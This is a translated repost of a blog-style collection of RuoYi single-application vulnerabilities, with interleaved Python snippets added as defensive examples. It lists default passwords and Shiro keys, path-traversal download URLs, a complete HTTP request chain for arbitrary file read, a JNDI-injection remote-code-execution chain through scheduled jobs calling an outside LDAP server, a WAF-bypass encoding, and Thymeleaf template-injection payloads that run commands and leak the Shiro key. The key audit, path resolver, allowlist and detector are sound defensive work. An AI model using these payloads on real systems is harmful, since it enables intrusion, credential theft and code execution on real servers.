RuoYi Single-Application Edition Vulnerability Collection
安全艺术
11 January 2026, 08:40, Beijing
RuoYi comes in several editions. The most widely used are the single-application edition (RuoYi), the front-end/back-end separated edition (RuoYi-Vue), the microservice edition (RuoYi-Cloud) and the mobile edition (RuoYi-App).
1. RuoYi Weak Credentials
Usernames: admin ruoyi druid ry
Passwords: 123456 admin druid admin123 admin888 admin@123
2. RuoYi Default Shiro Key
# Default AES (rememberMe) key for each RuoYi version range
# 4.6.1-4.3.1
zSyK5Kp6PZAAjlT+eeNMlg==
# 3.4 and below
fCq+/xW488hMTCD+cmJ3aQ==
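A defender-side audit for this section, added here as an example and not part of the original post or of RuoYi's code. It classifies a configured Shiro rememberMe cipherKey: a value equal to one of the default keys above lets anyone forge rememberMe cookies, so it is reported as "default-key"; a value that is not valid Base64 or not an AES key length is reported too, and a fresh random key is generated as the replacement. The property path shiro.cookie.cipherKey in the sample config is an assumption about the application.yml layout, not something taken from the page.

```python
import base64
import binascii
import os
from typing import List, Tuple

# The two default rememberMe keys listed in this section (constructed lookup set).
KNOWN_DEFAULT_KEYS = {
    "zSyK5Kp6PZAAjlT+eeNMlg==",  # RuoYi 4.3.1 - 4.6.1
    "fCq+/xW488hMTCD+cmJ3aQ==",  # RuoYi 3.4 and below
}


def audit_cipher_key(b64_key: str) -> str:
    """Classify a Shiro rememberMe cipherKey value taken from configuration.

    Returns one of: "default-key", "invalid-base64", "bad-length", "ok".
    """
    key = b64_key.strip()
    if key in KNOWN_DEFAULT_KEYS:
        return "default-key"
    try:
        raw = base64.b64decode(key, validate=True)
    except (binascii.Error, ValueError):
        return "invalid-base64"
    # Shiro's rememberMe cipher is AES, so the decoded key must be 16, 24 or 32 bytes.
    if len(raw) not in (16, 24, 32):
        return "bad-length"
    return "ok"


def find_cipher_keys(config_text: str) -> List[Tuple[str, str]]:
    """Scan a YAML-style config for 'cipherKey:' entries and audit each value."""
    findings = []
    for line in config_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("cipherKey:"):
            value = stripped.split(":", 1)[1].strip().strip("'\"")
            findings.append((value, audit_cipher_key(value)))
    return findings


def generate_cipher_key() -> str:
    """Produce a fresh random AES-128 key in the Base64 form Shiro expects."""
    return base64.b64encode(os.urandom(16)).decode("ascii")


# Constructed sample resembling RuoYi's application.yml; the property path
# shiro.cookie.cipherKey is an assumption about the layout, not taken from the page.
SAMPLE_CONFIG = """\
shiro:
  cookie:
    cipherKey: zSyK5Kp6PZAAjlT+eeNMlg==
"""

if __name__ == "__main__":
    results = find_cipher_keys(SAMPLE_CONFIG)
    for value, verdict in results:
        print(f"{value}: {verdict}")
    if any(verdict != "ok" for _, verdict in results):
        print("replace with a freshly generated key, e.g.", generate_cipher_key())
```

Run it against the deployed application.yml rather than the one in the repository: the default key problem is a deployment issue, and a fork may have changed the property path, in which case the line prefix in find_cipher_keys needs adjusting.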
3. RuoYi Back-End SQL Injection
RuoYi 4.6.0 Code Audit: SQL Injection Vulnerability, Part 1 (安全艺术, WeChat official account 安全艺术)
RuoYi Back-End SQL Injection Vulnerability Series, Part 2 (安全艺术, WeChat official account 安全艺术)
4. RuoYi CNVD-2021-01931 Back-End Arbitrary File Download
RuoYi < 4.5.1
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini
5. RuoYi CVE-2023-27025 Back-End Arbitrary File Download
RuoYi <= 4.7.6
POST /monitor/job/add HTTP/1.1
Host: 192.168.3.102
Content-Length: 278
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive
createBy=admin&jobId=666&jobName=test111&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile('D:\@CodeAudit\Code\RuoYi\RuoYi-4.7.6\RuoYi-4.7.6\ruoyi-admin\src\main\resources\application-druid.yml')&cronExpression=0%2F10+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=0&remark=
POST /monitor/job/run HTTP/1.1
Host: 192.168.3.102
Content-Length: 9
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive
jobId=666
Clear the job logs
POST /monitor/jobLog/clean HTTP/1.1
Host: 192.168.3.102
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Trigger the arbitrary file download
GET /common/download/resource?resource=1.txt HTTP/1.1
Host: 192.168.3.102
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive
Reading win.ini
URL-encode or Unicode-encode the path parameter to bypass WAF detection:
invokeTarget=ruoYiConfig.setProfile('%2F%65%74%63%2F%70%61%73%73%77%64')
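The server-side handling the download endpoint should apply to the resource parameter, added here as an example (not code from the post or from RuoYi): decode repeatedly so percent-encoded traversal is seen in clear, require the /profile prefix and a non-empty relative path, reject .. segments, and confirm that the resolved path still lies inside the upload directory. The /profile mapping and the base directory are assumptions drawn from the shape of the requests above.

```python
import urllib.parse
from pathlib import Path
from typing import Optional

# URL prefix that the download endpoint maps onto the configured upload directory
# (assumed from the '/profile/...' form of the requests above).
RESOURCE_PREFIX = "/profile"


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %2e%2e or %252e are seen in clear."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_resource(resource: str, profile_dir: str) -> Optional[str]:
    """Map a 'resource' parameter to an absolute path under profile_dir, or None if rejected."""
    decoded = fully_decode(resource)
    if "\x00" in decoded:
        return None
    # The prefix and a non-empty relative path are mandatory: a bare name such as
    # '1.txt' must never fall back to serving the base path itself.
    if not decoded.startswith(RESOURCE_PREFIX + "/"):
        return None
    relative = decoded[len(RESOURCE_PREFIX) + 1:]
    if not relative:
        return None
    # Reject traversal segments whether written with '/' or '\'.
    if ".." in relative.replace("\\", "/").split("/"):
        return None
    # Final check on the canonical path: the candidate must remain inside the base directory.
    base = Path(profile_dir).resolve()
    candidate = (base / relative).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return str(candidate)


if __name__ == "__main__":
    base_dir = "/srv/ruoyi/uploadPath"  # constructed example base directory
    for req in ("/profile/2024/01/report.pdf",
                "/profile/../../../../etc/passwd",
                "%2Fprofile%2F..%2F..%2FWindows%2Fwin.ini",
                "1.txt"):
        print(f"{req!r} -> {resolve_resource(req, base_dir)!r}")
```

The canonical-path check covers the section 4 form (/profile/../../etc/passwd) in all of its encodings, and the non-empty-path rule covers the section 5 chain, where the request carries only 1.txt and relies on the base path having been swapped for a file. That chain is only fully closed when a scheduled job can no longer call a configuration setter, which is what the section 6 allowlist addresses; a path check alone is not enough.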
6. RuoYi 4.7.1-4.7.8 Back-End Scheduled-Task RCE
java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C calc -A 192.168.3.102
javax.naming.InitialContext.lookup('ldap://192.168.3.102:1389/deserialJackson')
Convert the string above to hexadecimal:
https://www.bejson.com/convert/ox2str/
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target=0x(hex data) WHERE job_id = 1;')
Create a new scheduled task
Invoke target string:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target=0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e332e3130323a313338392f646573657269616c4a61636b736f6e2729 WHERE job_id = 1;')
Cron expression:
* * * * * ?
Run once
When this task runs it writes the target string into the job with ID 1; running job 1 then triggers the RCE.
Version 4.7.9 added an allowlist restriction.
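Two server-side gates for this attack chain, added here as an example and not RuoYi's own code: an allowlist for the invokeTarget string, in the spirit of the 4.7.9 restriction, and a statement-type check on SQL handed to the table-creation feature, with MySQL 0x hex literals decoded first so a reviewer sees the stored job target in clear. ryTask as the only allowed bean and com.ruoyi.quartz.task as the only allowed class package are this example's assumptions; the rejected inputs are the strings from this section and section 5.

```python
import re
from typing import List

# Bean names a scheduled job may legitimately invoke. 'ryTask' is RuoYi's sample
# task bean; treating it as the only allowed bean is this example's assumption.
ALLOWED_BEANS = {"ryTask"}
# Fully qualified classes are allowed only inside the project's task package (assumed).
ALLOWED_CLASS_PACKAGES = ("com.ruoyi.quartz.task.",)
# Strings that have no business in a job target: the JNDI entry class and remote schemes.
DENIED_SUBSTRINGS = ("javax.naming", "java.net.URL", "ldap:", "ldaps:", "rmi:", "http:", "https:")

# invokeTarget grammar: <bean or class>.<method>(<args>)
INVOKE_RE = re.compile(r"^\s*([A-Za-z_][\w.]*)\.([A-Za-z_]\w*)\((.*)\)\s*$", re.S)


def check_invoke_target(invoke_target: str) -> str:
    """Return 'ok' or a 'rejected: ...' reason for a job's invokeTarget string."""
    lowered = invoke_target.lower()
    for bad in DENIED_SUBSTRINGS:
        if bad.lower() in lowered:
            return f"rejected: contains {bad!r}"
    m = INVOKE_RE.match(invoke_target)
    if not m:
        return "rejected: not of the form bean.method(args)"
    target = m.group(1)
    if "." in target:
        if not target.startswith(ALLOWED_CLASS_PACKAGES):
            return f"rejected: class {target!r} outside allowed packages"
    elif target not in ALLOWED_BEANS:
        return f"rejected: bean {target!r} not in allowlist"
    return "ok"


HEX_LITERAL_RE = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def reveal_hex_literals(sql: str) -> str:
    """Replace MySQL 0x... literals with quoted text so a reviewer sees the real value."""
    def repl(m) -> str:
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)  # odd length: not a byte string, leave untouched
        text = bytes.fromhex(digits).decode("utf-8", errors="replace")
        return "'" + text.replace("'", "''") + "'"
    return HEX_LITERAL_RE.sub(repl, sql)


CREATE_TABLE_RE = re.compile(r"^\s*create\s+table\b", re.I)


def check_create_table_sql(sql: str) -> str:
    """Accept exactly one CREATE TABLE statement; anything else (such as an UPDATE) is rejected.

    Splitting on ';' is adequate for this check; a production gate should use a real
    SQL parser so that semicolons inside string literals cannot confuse it.
    """
    statements = [s for s in reveal_hex_literals(sql).split(";") if s.strip()]
    if len(statements) != 1:
        return "rejected: exactly one statement expected"
    if not CREATE_TABLE_RE.match(statements[0]):
        return "rejected: only CREATE TABLE is permitted"
    return "ok"


# The UPDATE statement from this section, with the 0x literal exactly as shown above.
PAGE_UPDATE_SQL = (
    "UPDATE sys_job SET invoke_target=0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e"
    "6c6f6f6b757028276c6461703a2f2f3139322e3136382e332e3130323a313338392f646573657269616c4a61636b"
    "736f6e2729 WHERE job_id = 1;"
)

if __name__ == "__main__":
    for target in ("ryTask.ryParams('ry')",
                   "ruoYiConfig.setProfile('/tmp/x.yml')",
                   "javax.naming.InitialContext.lookup('ldap://192.168.3.102:1389/deserialJackson')"):
        print(f"{target!r}: {check_invoke_target(target)}")
    print(reveal_hex_literals(PAGE_UPDATE_SQL))
    print(check_create_table_sql(PAGE_UPDATE_SQL))
```

The denylist is defence in depth only; the allowlist is what actually closes the hole, because the beans abused in sections 5 and 6 (ruoYiConfig, genTableServiceImpl) are simply not on it. For hunting existing compromise, run reveal_hex_literals and check_invoke_target over the invoke_target column of sys_job and over the gen-table request logs rather than over new input only.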
7. RuoYi 4.7.9-4.8.2 Back-End SSTI (Leaking the Shiro Key)
7.1. Thymeleaf Template Injection
POST /monitor/cache/getNames HTTP/1.1
Host: 192.168.3.105
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.105
Referer: http://192.168.3.105/system/dept/edit/103
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=e08dc9e6-5445-4016-8d01-ab20a00d7359
Connection: keep-alive
fragment=header((${T (java.lang.Runtime).getRuntime().exec("calc")}))
POST /monitor/cache/getNames HTTP/1.1
Host: 192.168.3.105
Content-Length: 205
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.105
Referer: http://192.168.3.105/system/dept/edit/103
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=e08dc9e6-5445-4016-8d01-ab20a00d7359
Connection: keep-alive
fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x
With the Shiro key, the login endpoint can be attacked directly for RCE.
Other affected endpoints (found by a global search):
/monitor/cache/getKeys
/monitor/cache/getValue
/demo/form/localrefresh/task
POST /monitor/cache/getKeys HTTP/1.1
Host: 192.168.3.102
Content-Length: 229
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=de6b9984-128c-417e-a91a-a106bc0cccb0
Connection: keep-alive
cacheName=1&cacheKeys=1&fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x
POST /monitor/cache/getValue HTTP/1.1
Host: 192.168.3.102
Content-Length: 241
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=de6b9984-128c-417e-a91a-a106bc0cccb0
Connection: keep-alive
cacheName=1&cacheKey=1&cacheValue=1&fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x
POST /demo/form/localrefresh/task HTTP/1.1
Host: 192.168.3.102
Content-Length: 226
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=de6b9984-128c-417e-a91a-a106bc0cccb0
Connection: keep-alive
name=1&type=1&date=1&fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x
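Detection logic for the fragment parameter, added here as an example and not part of the post: for form-encoded POSTs it flags a fragment value that is anything other than a plain fragment name, rating hits on the four endpoints listed above as high, and flags Thymeleaf expression openers in any other parameter. The sample traffic is constructed, with harmless 7*7 probes standing in for the payloads above; the assumption that a legitimate fragment is a bare identifier-like name is this example's.

```python
import re
from typing import List, Sequence, Tuple
from urllib.parse import parse_qs, unquote

# Endpoints shown above that pass a 'fragment' parameter into the Thymeleaf view name.
FRAGMENT_ENDPOINTS = {
    "/monitor/cache/getNames",
    "/monitor/cache/getKeys",
    "/monitor/cache/getValue",
    "/demo/form/localrefresh/task",
}
# Assumption: a legitimate fragment is a bare fragment name such as 'header' or 'cache-names'.
PLAIN_FRAGMENT_RE = re.compile(r"^[A-Za-z_][\w-]*$")
# Thymeleaf expression openers; the '__...__' preprocessing seen above wraps one of these.
EXPRESSION_MARKERS = ("${", "*{", "#{", "@{", "~{")


def inspect_request(path: str, body: str) -> List[str]:
    """Return alert strings for one form-encoded POST; an empty list means nothing suspicious."""
    alerts = []
    params = parse_qs(body, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; a second pass catches double-encoding
            if value == "":
                continue
            markers = [m for m in EXPRESSION_MARKERS if m in value]
            if name == "fragment" and not PLAIN_FRAGMENT_RE.match(value):
                severity = "high" if path in FRAGMENT_ENDPOINTS else "medium"
                alerts.append(f"[{severity}] {path}: fragment is not a plain fragment name: {value!r}")
            elif markers:
                alerts.append(f"[medium] {path}: template expression {markers} in parameter {name!r}")
    return alerts


def scan(requests: Sequence[Tuple[str, str]]) -> List[str]:
    """Run inspect_request over (path, body) pairs, e.g. from a WAF or proxy that logs bodies."""
    alerts = []
    for path, body in requests:
        alerts.extend(inspect_request(path, body))
    return alerts


# Constructed sample traffic; the probe values are written for this example.
SAMPLE_REQUESTS = [
    ("/monitor/cache/getNames", "fragment=cache-names"),
    ("/monitor/cache/getNames", "fragment=header((%24%7B7*7%7D))"),
    ("/monitor/cache/getKeys", "cacheName=1&cacheKeys=1&fragment=__%24%7B%40securityManager%7D__%3A%3A.x"),
    ("/monitor/cache/getValue", "cacheName=1&cacheKey=1&cacheValue=1&fragment=%2524%257B7*7%257D"),
    ("/system/user/list", "pageNum=1&pageSize=10&userName=%24%7B7*7%7D"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert)
```

Because the payload travels in the POST body, an access log that records only the request line will not show it; the rule needs a source that captures form bodies (WAF, reverse proxy, or application-level request logging). The first alert on any of the four endpoints is also the cue to rotate the Shiro cipherKey, since leaking it is exactly what the payloads above are built to do.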
Reposted from: 安全艺术, 《Ruoyi单应用版本漏洞合集》 (RuoYi Single-Application Edition Vulnerability Collection)